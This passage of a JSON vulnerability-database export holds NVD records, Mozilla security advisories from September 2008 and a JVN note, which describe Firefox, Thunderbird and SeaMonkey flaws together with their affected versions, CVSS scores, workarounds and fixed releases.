"cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:firefox:0.9:rc", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:firefox:0.9_rc", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:thunderbird:2.0_8", "cpe:/a:mozilla:thunderbird:2.0_.6", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:firefox:0.9", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:seamonkey", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0_.5", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:firefox:0.9.3", "cpe:/a:mozilla:thunderbird:2.0.0.15", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.7.3", "cpe:/a:mozilla:thunderbird:2.0_.9", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6"], "id": "CVE-2008-4061", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4061", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-29T14:26:04", "references": ["http://www.debian.org/security/2008/dsa-1669", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.412123", "http://www.securityfocus.com/bid/31346", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:206", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:205", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.379422", "http://www.vupen.com/english/advisories/2008/2661", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45347", "https://bugzilla.mozilla.org/show_bug.cgi?id=439034", "http://www.mozilla.org/security/announce/2008/mfsa2008-38.html", "http://www.redhat.com/support/errata/RHSA-2008-0882.html", "http://www.debian.org/security/2008/dsa-1649", "http://www.debian.org/security/2009/dsa-1696", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html", "http://www.ubuntu.com/usn/usn-645-2", "http://www.debian.org/security/2009/dsa-1697", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.405232", "http://www.redhat.com/support/errata/RHSA-2008-0908.html", "http://www.securitytracker.com/id?1020919", "http://www.ubuntu.com/usn/usn-647-1", "http://www.ubuntu.com/usn/usn-645-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "http://download.novell.com/Download?buildid=WZXONb-tqBw~", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "The nsXMLDocument::OnChannelRedirect function in Mozilla Firefox before 2.0.0.17, Thunderbird before 2.0.0.17, and SeaMonkey before 1.1.12 allows remote attackers to bypass the Same Origin Policy and execute arbitrary JavaScript code via unknown vectors.", "edition": 3, "reporter": "NVD", "published": "2008-09-24T16:37:04", "title": "CVE-2008-3835", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:04", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9643", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9643"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-3835"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9643", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9643"}], "modified": "2017-09-28T21:31:53", "cpe": ["cpe:/a:mozilla:thunderbird:2.0.0.11", "cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:2.0_.13", "cpe:/a:mozilla:thunderbird:2.0_.14", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:1.0::dev", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:0.8", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:thunderbird:1.7.1", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:firefox:0.10.1", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.8", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:0.9.2", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:thunderbird:2.0_.12", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.0::alpha", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:thunderbird:2.0.0.13", "cpe:/a:mozilla:firefox:0.10", "cpe:/a:mozilla:firefox:0.9.1", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:thunderbird:1.0.5:beta", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:thunderbird:2.0_.4", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:firefox:0.9:rc", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:firefox:0.9_rc", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:thunderbird:2.0_8", "cpe:/a:mozilla:thunderbird:2.0_.6", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:0.9", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:seamonkey", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0_.5", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:firefox:0.9.3", "cpe:/a:mozilla:thunderbird:2.0.0.15", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.7.3", "cpe:/a:mozilla:thunderbird:2.0_.9", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6"], "id": "CVE-2008-3835", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3835", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-41\r\n\r\nTitle: Privilege escalation via XPCnativeWrapper pollution\r\nImpact: Critical\r\nAnnounced: September 23, 2008\r\nReporter: moz_bug_r_a4, Olli Pettay\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.0.2\r\n Firefox 2.0.0.17\r\n Thunderbird 2.0.0.17\r\n SeaMonkey 1.1.12\r\nDescription\r\n\r\nMozilla security researcher moz_bug_r_a4 reported a series of vulnerabilities by which page content can pollute XPCNativeWrappers and have arbitrary code run with chrome privileges. One variant reported by moz_bug_r_a4 only affected Firefox 2.\r\n\r\nMozilla developer Olli Pettay reported that XSLT can create documents which do not have script handling objects. moz_bug_r_a4 also reported that document.loadBindingDocument() returns a document that does not have a script handling object. These issues could also be used by an attacker to run arbitrary script with chrome privileges.\r\n\r\nThunderbird shares the browser engine with Firefox and could be vulnerable if JavaScript were to be enabled in mail. This is not the default setting and we strongly discourage users from running JavaScript in mail.\r\nWorkaround\r\n\r\nDisable JavaScript until a version containing these fixes can be installed.\r\nReferences\r\n\r\n * XPCnativeWrapper pollution bugs\r\n * CVE-2008-4058\r\n * XPCnativeWrapper pollution (Firefox 2)\r\n * CVE-2008-4059\r\n * Documents without script handling objects\r\n * CVE-2008-4060\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-41", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-4059", "CVE-2008-4060", "CVE-2008-4058"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20581", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20581", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-44\r\n\r\nTitle: resource: traversal vulnerabilities\r\nImpact: Moderate\r\nAnnounced: September 23, 2008\r\nReporter: Boris Zbarsky, Georgi Guninski\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.0.2\r\n Firefox 2.0.0.17\r\n Thunderbird 2.0.0.17\r\n SeaMonkey 1.1.12\r\nDescription\r\n\r\nMozilla developer Boris Zbarsky reported that the resource: protocol allowed directory traversal on Linux when using URL-encoded slashes.\r\n\r\nMozilla developer Georgi Guninski reported that the restrictions imposed on local HTML files could be bypassed using the resource: protocol. The vulnerability allowed an attacker to read information about the system and prompt the victim to save the information in a file.\r\nReferences\r\n\r\n * Directory traversals via resource: scheme\r\n * CVE-2008-4067\r\n * CVE-2008-4068\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-44", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 2.1}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-4067", "CVE-2008-4068"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20578", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20578", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-43\r\n\r\nTitle: BOM characters, low surrogates stripped from JavaScript before execution\r\nImpact: Moderate\r\nAnnounced: September 23, 2008\r\nReporter: Dave Reed, Chris Weber, Gareth Heyes\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.0.2\r\n Firefox 2.0.0.17\r\n Thunderbird 2.0.0.17\r\n SeaMonkey 1.1.12\r\nDescription\r\n\r\nMicrosoft developer Dave Reed reported that certain BOM characters are stripped from JavaScript code before it is executed. This can lead to code, which would otherwise be treated as part of a quoted string, to be executed. The issue could potentially be used by an attacker to bypass or evade script filters and perform a cross-site scripting (XSS) attack. Chris Weber of Casaba Security independently reported the same issue, noting that the same parsing problem affected other attributes, such as the -moz-binding style property, that could also be used to perform XSS attacks.\r\n\r\nSecurity researcher Gareth Heyes reported an issue with the HTML parser in which the parser ignored certain low surrogate characters if they were HTML-escaped. This issue could potentially be used to bypass naive script filtering and used in an XSS attack. This issue only affected Firefox 2.\r\n\r\nThunderbird shares the browser engine with Firefox and could be vulnerable if JavaScript were to be enabled in mail. This is not the default setting and we strongly discourage users from running JavaScript in mail. Without further investigation we cannot rule out the possibility that for some of these an attacker might be able to prepare memory for exploitation through some means other than JavaScript such as large images.\r\nWorkaround\r\n\r\nDisable JavaScript until a version containing these fixes can be installed.\r\nReferences\r\n\r\n * Stripped BOM characters\r\n * CVE-2008-4065\r\n * HTML escaped low surrogates bug\r\n * CVE-2008-4066\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-43", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-4066", "CVE-2008-4065"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20579", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20579", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-42\r\n\r\nTitle: Crashes with evidence of memory corruption (rv:1.9.0.2/1.8.1.17)\r\nImpact: Critical\r\nAnnounced: September 23, 2008\r\nReporter: Mozilla developers and community\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.0.2\r\n Firefox 2.0.0.17\r\n Thunderbird 2.0.0.17\r\n SeaMonkey 1.1.12\r\nDescription\r\n\r\nMozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.\r\n\r\nDrew Yao of Apple Product Security reported two crashes in Mozilla image rendering code. This vulnerability only affected Firefox 3.\r\n\r\nDavid Maciejak of Fortinet's FortiGuard Global Security Research Team also reported a crash in graphics rendering which only affected Firefox 3.\r\n\r\nThunderbird shares the browser engine with Firefox and could be vulnerable if JavaScript were to be enabled in mail. This is not the default setting and we strongly discourage users from running JavaScript in mail. Without further investigation we cannot rule out the possibility that for some of these an attacker might be able to prepare memory for exploitation through some means other than JavaScript such as large images.\r\nWorkaround\r\n\r\nDisable JavaScript until a version containing these fixes can be installed.\r\nReferences\r\n\r\nJesse Ruderman reported a crash in the layout engine.\r\n\r\n * layout engine crash\r\n * CVE-2008-4061\r\n\r\nIgor Bukanov, Philip Taylor, Georgi Guninski, and Antoine Labour reported crashes in the JavaScript engine.\r\n\r\n * JavaScript engine crashes\r\n * CVE-2008-4062\r\n\r\nJesse Ruderman, Bob Clary, and Martijn Wargers reported crashes in the layout engine which only affected Firefox 3.\r\n\r\n * layout engine crashes\r\n * CVE-2008-4063\r\n\r\nDavid Maciejak and Drew Yao reported crashes in graphics rendering which only affected Firefox 3.\r\n\r\n * graphics rendering crashes\r\n * CVE-2008-4064\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-42", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-4063", "CVE-2008-4062", "CVE-2008-4064", "CVE-2008-4061"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20580", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20580", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-45\r\n\r\nTitle: XBM image uninitialized memory reading\r\nImpact: Low\r\nAnnounced: September 23, 2008\r\nReporter: Billy Hoffman\r\nProducts: Firefox, SeaMonkey\r\n\r\nFixed in: Firefox 2.0.0.17\r\n SeaMonkey 1.1.12\r\nDescription\r\n\r\nSecurity researcher Billy Hoffman discovered a bug in the XBM decoder that allowed random small chunks of uninitialized memory to be read. The severity of this bug was low and did not appear to cause any memory corruption.\r\n\r\nFirefox 3 is not affected by this issue\r\nReferences\r\n\r\n * Uninitialized memory reading\r\n * CVE-2008-4069\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-45", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-4069"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20577", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20577", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-39\r\n\r\nTitle: Privilege escalation using feed preview page and XSS flaw\r\nImpact: Critical\r\nAnnounced: September 23, 2008\r\nReporter: moz_bug_r_a4\r\nProducts: Firefox\r\n\r\nFixed in: Firefox 2.0.0.17\r\nDescription\r\n\r\nMozilla security researcher moz_bug_r_a4 reported a series of vulnerabilities in feedWriter which allow scripts from page content to run with chrome privileges.\r\n\r\nFirefox 3 is not affected by this issue\r\nWorkaround\r\n\r\nDisable JavaScript until a version containing these fixes can be installed.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=360529\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=430658\r\n * CVE-2008-3836\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-39", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-3836"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20583", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20583", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-46\r\n\r\nTitle: Heap overflow when canceling newsgroup message\r\nImpact: Critical\r\nAnnounced: September 25, 2008\r\nReporter: Georgi Guninski\r\nProducts: Thunderbird, SeaMonkey\r\n\r\nFixed in: Thunderbird 2.0.0.17\r\n SeaMonkey 1.1.12\r\nDescription\r\n\r\nGeorgi Guninski reported a buffer overflow in the handling of cancelled newsgroup messages. The error was caused by too small a heap buffer being allocated to store message header information. This buffer could be overrun by an attacker using a specially crafted message which could crash the mail reader and potentially be used to run arbitrary code on the victim's computer.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=425152\r\n * CVE-2008-4070\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-46", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-4070"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20576", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20576", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-40\r\n\r\nTitle: Forced mouse drag\r\nImpact: Low\r\nAnnounced: September 23, 2008\r\nReporter: Paul Nickerson, Liu Die Yu\r\nProducts: Firefox, SeaMonkey\r\n\r\nFixed in: Firefox 3.0.2\r\n Firefox 2.0.0.17\r\n SeaMonkey 1.1.12\r\nDescription\r\n\r\nMozilla developer Paul Nickerson reported a variant of a click-hijacking vulnerability discovered in Internet Explorer by Liu Die Yu. The vulnerability allowed an attacker to move the content window while the mouse was being clicked, causing an item to be dragged rather than clicked-on. This issue could potentially be used to force a user to download a file or perform other drag-and-drop actions.\r\nWorkaround\r\n\r\n 1. open Options/Preferences dialog\r\n 2. go to the "Content" tab\r\n 3. click the "Advanced..." button on the same line as the "Enable JavaScript" checkbox\r\n 4. UN-check the "Move or resize existing windows" box.\r\n\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=329385\r\n * CVE-2008-3837\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-40", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-3837"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20582", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20582", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-37\r\n\r\nTitle: UTF-8 URL stack buffer overflow\r\nImpact: Critical\r\nAnnounced: September 23, 2008\r\nReporter: Justin Schuh, Tom Cross, Peter William\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 2.0.0.17\r\n Thunderbird 2.0.0.17\r\n SeaMonkey 1.1.12\r\nDescription\r\n\r\nJustin Schuh and Tom Cross of the IBM X-Force and Peter Williams of IBM Watson Labs reported errors in Mozilla URL parsing routines. These errors could be exploited using a specially crafted UTF-8 URL in a hyperlink which could overflow a stack buffer and allow an attacker to execute arbitrary code.\r\n\r\nFirefox 3 is not affected by this issue\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=443288\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=451617\r\n * CVE-2008-0016\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-37", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-0016"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20585", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20585", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:27", "references": [], "description": "Mozilla Foundation Security Advisory 2008-38\r\n\r\nTitle: nsXMLDocument::OnChannelRedirect() same-origin violation\r\nImpact: High\r\nAnnounced: September 23, 2008\r\nReporter: moz_bug_r_a4\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 2.0.0.17\r\n Thunderbird 2.0.0.17\r\n SeaMonkey 1.1.12\r\nDescription\r\n\r\nMozilla security researcher moz_bug_r_a4 reported that the same-origin check in nsXMLDocument::OnChannelRedirect() could be bypassed. This vulnerability could be used to execute JavaScript in the context of a different website.\r\n\r\nFirefox 3 is not affected by this issue\r\n\r\nThunderbird shares the browser engine with Firefox and could be vulnerable if JavaScript were to be enabled in mail. This is not the default setting and we strongly discourage users from running JavaScript in mail.\r\nWorkaround\r\n\r\nDisable JavaScript until a version containing these fixes can be installed.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=439034\r\n * CVE-2008-3835\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2008-09-29T00:00:00", "title": "Mozilla Foundation Security Advisory 2008-38", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-3835"], "modified": "2008-09-29T00:00:00", "id": "SECURITYVULNS:DOC:20584", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20584", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "jvn": [{"lastseen": "2018-08-31T00:36:26", "references": [], "description": "\n ## Description\n\nMozilla Firefox contains a vulnerability in the rendering of specific numeric character references, which may result in cross-site scripting. \n\n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * Mozilla Firefox prior to 3.6\n", "edition": 3, "reporter": "Japan Vulnerability Notes", "published": "2011-07-28T00:00:00", "title": "JVN#96950482: Mozilla Firefox vulnerable to cross-site scripting", "type": "jvn", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "info", "cvelist": ["CVE-2008-4066"], "modified": "2011-08-01T00:00:00", 